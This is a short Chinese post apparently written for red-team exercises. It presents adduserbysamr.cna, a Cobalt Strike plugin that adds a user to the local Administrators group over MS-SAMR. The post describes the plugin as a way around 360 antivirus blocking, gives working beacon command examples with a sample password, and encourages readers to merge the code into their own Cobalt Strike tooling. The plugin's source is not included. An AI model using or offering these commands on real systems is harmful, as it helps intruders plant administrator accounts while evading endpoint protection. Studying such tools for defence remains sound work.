hw攻防演练期间,工具安全性自测!
工具简介
这个插件是通过MS-SAMR协议将用户添加到管理员组,所以暂时可以用来绕过部分防护添加管理员用户。
工具使用
我们在cobaltstrike中使用shell、execute、run几个命令添加用户时都会被360等防护拦截,如下图所示。
加载adduserbysamr.cna,使用adduserbysamr命令通过samr将用户添加到localgroup,groupName默认为“Administrators”,请勿在AD中使用。
beacon> help adduserbysamr Use: adduserbysamr [username] [password] [groupName] e.g: adduserbysamr sysadmin p@ssw0rd adduserbysamr sysadmin p@ssw0rd Administrators adduserbysamr sysadmin p@ssw0rd "Remote Desktop Users"
绕过360成功添加管理员用户...,我们还可以修改下这个项目代码集成到自己的cobaltstrike插件中使用。
